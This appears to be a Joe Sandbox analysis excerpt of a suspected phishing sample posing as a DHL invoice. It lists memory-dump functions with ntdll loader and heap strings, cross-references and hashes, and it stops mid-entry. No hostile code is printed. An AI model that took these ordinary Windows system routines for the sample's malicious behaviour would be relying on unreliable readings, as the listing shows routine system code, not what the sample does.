__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D74

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
Instruction ID: 369a7155a3c4b2a271470fc5bf2f38f5af22f6c10a55d6822b7e2011f66a80e4
Opcode Fuzzy Hash: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
Instruction Fuzzy Hash: 37426CB2900715DFDB61DF28C980BAAB7F8BF44314F1445A9E98DEB242D770A984CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0194A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 0194A3FF
LdrResFallbackLangList Enter, xrefs: 0194A3EF
8, xrefs: 0194A3E7
6, xrefs: 0194A3F7

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
Instruction ID: 446a4967066c8e52600aea194c30a98db43c2d00a685ea1cbfce339dc7eb60d8
Opcode Fuzzy Hash: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
Instruction Fuzzy Hash: F1C19B74548382CFD715CF58C144F6AB7E8FF84704F04496AF99A8B291E738CA49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01978402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01978591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0197855E
minkernel\ntdll\ldrinit.c, xrefs: 01978421
LdrpInitializeProcess, xrefs: 01978422

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
Instruction ID: 2aa38375ad087932ecb337df4bb9f3936c2b04daeb8e294580585fb35150ac3e
Opcode Fuzzy Hash: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
Instruction Fuzzy Hash: 0C916871508345AFE721EF65CC85FABBAECBF84784F40092EFA8C96151E270D944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0197273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019B22B6
.Local, xrefs: 019728D8
SXS: %s() passed the empty activation context, xrefs: 019B21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019B21D9, 019B22B1

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
Instruction ID: b4c5edd95fae2561be4ab7e3058d98f36014fbe25cd5b1d220d2f1f9aac516c7
Opcode Fuzzy Hash: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
Instruction Fuzzy Hash: FDA1B031910229DBDB25CF68C984BE9B7B5FF58354F2845E9D90CAB251D730AE81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01974AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 019B3425, 019B3432, 019B3451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 019B3456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 019B342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 019B3437

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
Instruction ID: de4a75749a2708e1a0de6e3d4823bbe1c098361287fd4fcbc3ee0bee879bc4aa
Opcode Fuzzy Hash: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
Instruction Fuzzy Hash: 356121366007129BD722CF1DC981FBAB7EABF80B51F19852DE85D9B242D734E901CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019A10AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019A106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019A0FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019A1028

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
Instruction ID: c5656b6ebc36bef3f380fd7b47d1181235f29b8adbf3110a396a85d0d161e7ae
Opcode Fuzzy Hash: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
Instruction Fuzzy Hash: 9E71CDB19043459FCB21EF18C884F9B7BADAF96764F400868F94D8B246D334D589CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0196245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 019AA998
minkernel\ntdll\ldrinit.c, xrefs: 019AA9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019AA992
apphelp.dll, xrefs: 01962462

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
Instruction ID: cb4de5b81f391a4724a2310160ab95054d5022aceab9826f932cf103a342628a
Opcode Fuzzy Hash: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
Instruction Fuzzy Hash: 4A316879A00202ABDB32DF5DDC85FAA7BB9FFC8B00F550419F8096B245C7B49946C790

Uniqueness

Uniqueness Score: -1.00%

Function 019529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01953255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0195327D
HEAP: , xrefs: 01953264

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
Instruction ID: f0a151fba94ad02f85fee498b7772fa67610108a17811ecc79c93493052ccbfc
Opcode Fuzzy Hash: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
Instruction Fuzzy Hash: C692BC71A04249DFDB65CF68C440BAEBBF5FF48304F188499E84AAB392D735AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01950770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 019A50AE
HEAP: , xrefs: 019A50BD
(UCRBlock->Size >= *Size), xrefs: 019A50CA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
Instruction ID: 032e0c581ba4a4c4c47e61bfb87c54c56400ce83143bf8beac20f86da3e62118
Opcode Fuzzy Hash: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
Instruction Fuzzy Hash: FDF1AB30B00606DFEB55CF68C894F6AB7B5FF84304F198568E91AAB385D730E985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01966962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 019ACA51
@, xrefs: 01966C24

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
Instruction ID: a3c25f7fb427ffaaf6b57667a5c0d35219a93e314cd2ad85d083e27ceb52bbb9
Opcode Fuzzy Hash: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
Instruction Fuzzy Hash: 53C260716083419FD729CF68C881BABBBE9BFC8754F04892DE98D97241D734D845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0193A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0199C2E6
UseFilter, xrefs: 0193A1C1
\??\, xrefs: 0199C1E4

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
Instruction ID: 1548142f0d65dd7dcca3cc9ea8073d25d4a4b87d6292b98f17ef821ab3f53100
Opcode Fuzzy Hash: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
Instruction Fuzzy Hash: F6A14B759116299BDF31DF68CC88BAAB7B8EF88711F1001EAE90DA7250D7359E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01960BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 019AA121
Failed to allocated memory for shimmed module list, xrefs: 019AA10F
LdrpCheckModule, xrefs: 019AA117

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
Instruction ID: 573f599d3dbf714891d0db4e66b22b48aeebaf67c2f23871568cfbfccccbce2a
Opcode Fuzzy Hash: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
Instruction Fuzzy Hash: A671B374E00205AFDB25DF68CD85BAEB7F8FB88304F18446DE4099B255D739A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01950A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 019A5335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 019A534D
HEAP: , xrefs: 019A5342

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 50a266c350549ac66304f819e83c1da3c4ad1cce6abf5b9d093e365a0e573d66
Instruction ID: 82415c4646f77906919082dd713b5d94b8656f862964b86c178792ebaa7120f3
Opcode Fuzzy Hash: 50a266c350549ac66304f819e83c1da3c4ad1cce6abf5b9d093e365a0e573d66
Instruction Fuzzy Hash: 7E61BD30600302DFEB69CF28D584B6ABBE5FF84304F198959F85D9B296D770E881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0197C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 019B82DE
Failed to reallocate the system dirs string !, xrefs: 019B82D7
minkernel\ntdll\ldrinit.c, xrefs: 019B82E8

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
Instruction ID: 2b4115b020d194cce72932c3e6ec201f7f40cf0fab243983db86303b430b5423
Opcode Fuzzy Hash: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
Instruction Fuzzy Hash: 6341D175544302ABD721EB68DD85B9BBBECBF89790F00492AF94DD3250EB70D901CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 019FC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019FC1C5
PreferredUILanguages, xrefs: 019FC212

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
Instruction ID: e45cdb0e5a60d41cf92e06514e1543f8bc3312d75fce74bfeab0d4eac28fd10d
Opcode Fuzzy Hash: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
Instruction Fuzzy Hash: 91414F75A0020DBBEB11DAD8C851FEEBBBCEB54705F14806AEA0DA7240D774DA448B50

Uniqueness

Uniqueness Score: -1.00%

Function 019D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 019D4160
LdrpResValidateFilePath Exit, xrefs: 019D4172
@, xrefs: 019D4225

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
Instruction ID: 209dc5b7c44760f3770bf9f831288cc5c0c80248ca936c41a7c36166f34aafed
Opcode Fuzzy Hash: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
Instruction Fuzzy Hash: 7F411331A003598BEB26DFE9C840BADBBB8FFA5340F14445ADA49FBB91D7348901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019C4888
LdrpCheckRedirection, xrefs: 019C488F
minkernel\ntdll\ldrredirect.c, xrefs: 019C4899

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
Instruction ID: 8d22a90f908aa216d366c49d324148e9dd1d69e27dc8c51036b2e857a7940ac4
Opcode Fuzzy Hash: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
Instruction Fuzzy Hash: 89419D32B046519BDB22CE68D860A27BBE8AF89E51B05066DFDCC97255D730E801CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01950BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 019A5431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 019A5449
HEAP: , xrefs: 019A543E

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
Instruction ID: 2ffaeed25977beeb7884c48463f9fe15ac744010b6a9afaaca72d0d1ccab7634
Opcode Fuzzy Hash: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
Instruction Fuzzy Hash: 6B11E1323141029FEB69CB18C481F7AB3E9EF80B1AF1A8519F80EDB251DB30D849C791

Uniqueness

Uniqueness Score: -1.00%

Function 019C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 019C20F3
minkernel\ntdll\ldrinit.c, xrefs: 019C2104
LdrpInitializationFailure, xrefs: 019C20FA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
Instruction ID: bd7553582a527c1e701d2931248374985cfe8dfbedf3e226caadfc0f48798c16
Opcode Fuzzy Hash: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
Instruction Fuzzy Hash: EBF0AF39A40318ABEA24EB4C9D46FA93B6CFB81E54F100069F64867285D2E0A941C792

Uniqueness

Uniqueness Score: -1.00%

Function 019503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019A4D8A

Strings

#%u, xrefs: 019A4D82

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
Instruction ID: 6a3065ca65c623510c8a0b0ffad245c3a72d7fb75bbfd9d1e2381460e94ffc69
Opcode Fuzzy Hash: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
Instruction Fuzzy Hash: 30714C71A0014A9FDB01DF98C980FAEBBF8BF48744F194065E909A7251E674EE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0194A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0194AA25
LdrResSearchResource Enter, xrefs: 0194AA13

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
Instruction ID: 504aff2f34a9a8b67f6ddc204f82518cfce05dc1290574dbbe9e9387ccef7b98
Opcode Fuzzy Hash: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
Instruction Fuzzy Hash: FFE18271E802199FEB22CF99C980FAEBBBEFF54311F50442AE90AE7251D7349944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A0A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01A0A551
`, xrefs: 01A0A44B

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 180b1c94abb03f8c75ec0fa4180756701f78bb89244d64de1a0699537963e1b6
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 5DC19F312043429BE726CF28D841B6BBBE5AFC4318F188A2DF696CB2D1D775E505CB41

Uniqueness

Uniqueness Score: -1.00%

Function 019BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 019BE751
Legacy, xrefs: 019BE75A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: f140f1def98a182b06fd81f7f665e5942bd52e984214c3edffa67dcbe352adc6
Instruction ID: bb6f964ab13ea882953204992d8b34d36bce3cdf00f6b4b0320768528f472ae5
Opcode Fuzzy Hash: f140f1def98a182b06fd81f7f665e5942bd52e984214c3edffa67dcbe352adc6
Instruction Fuzzy Hash: 31614A71E006199FDB15DFA88980BEEBBB9FB48700F14846DE65DEB251D731A900CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 019E4525
@, xrefs: 019E4437

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
Instruction ID: 50f052725fb6c43b7cd57cddc53e8e6ba7eb4d9fa1ca0af1d446dfe98565e9eb
Opcode Fuzzy Hash: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
Instruction Fuzzy Hash: 4851FA71E0021DAFDB11DFA9CC94EEEBBFDAB44754F100529E619F7250D6309905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01940540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0194063D

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
Instruction ID: 765db01008f92531c76ce721210b54467943aa506b19d595a5163b53c24140df
Opcode Fuzzy Hash: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
Instruction Fuzzy Hash: F351BB715047429BD724EF69C440AE7BBE8AF84305F18893EFAAE87241E770D545CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0194A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0194A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0194A2FB

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
Instruction ID: 852fa0bb6b1a999bac4379e7027f4b7a6ecbc39595c516cf989a78bf9e18ab64
Opcode Fuzzy Hash: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
